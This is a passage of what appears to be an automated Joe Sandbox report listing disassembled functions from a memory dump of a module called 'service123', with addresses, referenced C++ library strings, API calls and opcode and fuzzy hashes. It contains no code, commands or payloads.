Instruction Fuzzy Hash: 7D1163B2A153148FCB00AF2CD08085ABBF4AF45628F42086DE8C89B311D232D959CF92

Function 6C3298F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C32A30E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 79b04b3fff2640ef87f978d0db454c1e30cf8b2821dc330315382fe66a5bd947
Instruction ID: 5b7af5495e265a1aa7a3439d685f0ed59e1cb12b98ed6bcd0b20e8dfb5e7ac09
Opcode Fuzzy Hash: 79b04b3fff2640ef87f978d0db454c1e30cf8b2821dc330315382fe66a5bd947
Instruction Fuzzy Hash: 6CA28D71A043588FDF10CF69C48478DBBF2AF46328F288668D865AB692D739DC45CF91

Function 6C3287C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C3291DE

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 4edd8a84edcd05038731aaa5084daafa4fcc306f6a8ebb963fb8398546422183
Instruction ID: 5024dc388f2ff00f0fd44108039f67929704ba8ff09bf25cba64f042b258f916
Opcode Fuzzy Hash: 4edd8a84edcd05038731aaa5084daafa4fcc306f6a8ebb963fb8398546422183
Instruction Fuzzy Hash: E2A28C71A043588FDF10CF69C48078DBBB2BF46328F288669D865AB692D739DC45CF91

Function 6C363690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C363710

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 1a4c25becd4d9f5e3eaec6d893b363ed6f5efcddc0c601dffdbb5b686b16a0a8
Instruction ID: 19d5a2c94b4df118505aaa21b42c72bec61317f4a0765e0cd5968929af47f4ab
Opcode Fuzzy Hash: 1a4c25becd4d9f5e3eaec6d893b363ed6f5efcddc0c601dffdbb5b686b16a0a8
Instruction Fuzzy Hash: 5F015AB26093409AC3406F6A84C465BFFE4AF82228F98886DE4C84BB19C336D4448F63

Function 6C31A970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A98D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A9B0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b84f543798a8d88aee0edd6d8fb42c98e365be2870698d57fe881f1cbca5e562
Instruction ID: 3dcf7e1435481be488e2e4f0fe7085ac3c6003d00c0dc34f5310ae760ba8d478
Opcode Fuzzy Hash: b84f543798a8d88aee0edd6d8fb42c98e365be2870698d57fe881f1cbca5e562
Instruction Fuzzy Hash: 19F05EB2A153148FCB00EF2CC08085AB7F4BF45228F4208ADE8C49B711E632ED49CF92

Function 6C31A580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A59D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A5C0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b84f543798a8d88aee0edd6d8fb42c98e365be2870698d57fe881f1cbca5e562
Instruction ID: f2c6d14b5ffb17a795bb379c034fa73cf2f13b1e6d0da336a27957c7147d1766
Opcode Fuzzy Hash: b84f543798a8d88aee0edd6d8fb42c98e365be2870698d57fe881f1cbca5e562
Instruction Fuzzy Hash: 90F054B1A153148FCB00EF2CC08085AB7F4BF45218F4208ADD4C49B715E232ED49CF92

Function 6C31C510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C31C570
basic_string::substr, xrefs: 6C31C568

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: b47d4fc8c7f3a5899fd0176b125317769835fc6b47e006f0b2e87e96db0f192d
Instruction ID: e181b92ddb2f38160346233985c0fe50e1648d9c333cb3bcd51bd730c795c7c7
Opcode Fuzzy Hash: b47d4fc8c7f3a5899fd0176b125317769835fc6b47e006f0b2e87e96db0f192d
Instruction Fuzzy Hash: CE017871A182109BC704EF2DD48095AFBF1ABCA318F5489ADE088DB710D632E849CF87

Function 6C310740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3107A0
basic_string::substr, xrefs: 6C310798

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 11b13864fc1326197460435823b68a7f2b25b73d1ab8b12402d9e9a54c2e6f53
Instruction ID: 0f7dfa2dc5c055202c47513cc74f5e6806289113e18b182aee888a51a65bcd7b
Opcode Fuzzy Hash: 11b13864fc1326197460435823b68a7f2b25b73d1ab8b12402d9e9a54c2e6f53
Instruction Fuzzy Hash: B0012876A0A3009FC7049F29D88169AFBE0ABC9350F00992DE488D7704C234D8448F83

Function 6C3346E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bafa512f7ae9a638dd91722fe347432307194d0ce9af36046904bb432d7d7dd
Instruction ID: e9f049d640dd5970955c6ce880573d7df21931f702a90741d2d5114fe6b1522f
Opcode Fuzzy Hash: 6bafa512f7ae9a638dd91722fe347432307194d0ce9af36046904bb432d7d7dd
Instruction Fuzzy Hash: 53827C71E052E88FDB10CFA8C48078DBFF1AF46318F198259E869AB795D3369845CF91

Function 6C332CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde075dbdd738d3ca06d88277b402dc2b58cd23800b38721efc48dc27cf0d426
Instruction ID: 2eea2590108f212fc6fe3250fd835c444160a8e57cb18d0d1efd130946b87088
Opcode Fuzzy Hash: fde075dbdd738d3ca06d88277b402dc2b58cd23800b38721efc48dc27cf0d426
Instruction Fuzzy Hash: 1572A070A082E8CFDB11CFA8C48479DBBF1AF05328F149619D4A9AB791D3369846CF91

Function 6C33140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bcb9e279b3e13b1ccafbbc14e9b95ba6bf6c68fe002fbb0de583c05a2139927
Instruction ID: 8faf154156caf6cd2fbeba87881c2cf3db0350052a61dc6154e02590bad61c03
Opcode Fuzzy Hash: 8bcb9e279b3e13b1ccafbbc14e9b95ba6bf6c68fe002fbb0de583c05a2139927
Instruction Fuzzy Hash: 67728C70A092E8CFDB10CFA8C48479DBBF1AF0A318F189659D4A9AB791D335E845CF51

Function 6C332090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2746f435b754f44eee9c4a6dfa6882b22af28a989486ea9aec4d6d69ec1873
Instruction ID: 1df382ea485334b04c625f89c64b0401871443079b7bbd640cfda72c56b05ddb
Opcode Fuzzy Hash: 2a2746f435b754f44eee9c4a6dfa6882b22af28a989486ea9aec4d6d69ec1873
Instruction Fuzzy Hash: B9727D70E093A88FDB11CFA8C58878DBBF1BF05314F149659D8A9AB792C3369845CF91

Function 6C3307D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ad9db8ee847a1120b9bef2ad76e1e14598c82a878cb8972fae35e21b466d37
Instruction ID: c371bd595c016eae5da1a2ea6292a485a5ef35f7777de6f9fb63e0f291bf1e38
Opcode Fuzzy Hash: 60ad9db8ee847a1120b9bef2ad76e1e14598c82a878cb8972fae35e21b466d37
Instruction Fuzzy Hash: D9725970E092E8CFDB11CFA8C48478DBBF1AF06318F189659D4A9ABB91C735A845CF51

Function 6C31F760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31F8B3

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 2a958a097c71793fea2840b327faa9312fccb22d03693938209697c938e29b7d
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 56724874A08258CFCB08DFA8C08459DBBF2BF4D314F288659E865ABBA1D735AC45CF51

Function 6C337A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84452d325759f94652384c33e451ad45fc5325eb7a630752d92c6ce31feabab9
Instruction ID: ebe9a407311877e36c9d17128f2aed0a224986ada79715758f193c101248a277
Opcode Fuzzy Hash: 84452d325759f94652384c33e451ad45fc5325eb7a630752d92c6ce31feabab9
Instruction Fuzzy Hash: 4D52B2709052A8DFDB00CF68C5807DDBBF1AF46328F28965AE868AB791D336D845CF51

Function 6C322360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 2aec67776e8bdf7cc16068d3368a5a2db4cc9415f9f96898a3fdead96700c39a
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: B9E17875E152598FCF10CFA8C98468DBBF1BF49324F288265E865A7391D33AAD41CF60

Function 6C34DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 02ac46cc83eed629fabc851766f08be2d91e31f5a69ee23977bd15c276157465
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 16D16E71A042598FCB11CF68C4806DDBBF1BF4A328F588269E865AB791D335ED45CFA0

Function 6C30EB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C30EB50

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: d0c5dc44d5c938fc86d86dc347b9b07c9ac2483c23900257445113bab1fa165d
Instruction ID: 62e77684c5845072c6d0737053272453cf12658f3c8f5b8cc5ca6f6ed5487c60
Opcode Fuzzy Hash: d0c5dc44d5c938fc86d86dc347b9b07c9ac2483c23900257445113bab1fa165d
Instruction Fuzzy Hash: 10E012B6E082018F8B08EE74C48542BBBB16789200F449919D88153B44D630D54C8F97

Function 6C310260 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C310280

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: cc6e46ff49ff6191e51a09b5c5047d302b5e4649caa080cb04a8bc70ed06a9ec
Instruction ID: 21e349590076ede79db9ed15689fe85526eb9c679cbdf52891fce1980da9a5b5
Opcode Fuzzy Hash: cc6e46ff49ff6191e51a09b5c5047d302b5e4649caa080cb04a8bc70ed06a9ec
Instruction Fuzzy Hash: 73E0B6B5E496409FCB04EF18C585819F7F1AF9A304F54DA9DD58497B20D231D810CE1B

Function 6C33DBEE Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586c99244678772a19849cc96cca01612768fa753509f2485c2454aaedf64c9d
Instruction ID: 23190604c1bd4562e6c5f202e3e1a9139a0450b4fc0bd7d08aecae55d628ca93
Opcode Fuzzy Hash: 586c99244678772a19849cc96cca01612768fa753509f2485c2454aaedf64c9d
Instruction Fuzzy Hash: 4072BE70A043A88FDB04DFA8C48079DBBB1AF46318F189659E8589FB91D375DC86CF91

Function 6C341510 Relevance: .7, Instructions: 684COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692313f8413dbde3fe73dab4997dcc30e59ab5b724aa17bce7403e3023aaa434
Instruction ID: d24c2cdb90083586844cc2b132d4eab8494de6a2921662e01af179938a822c75
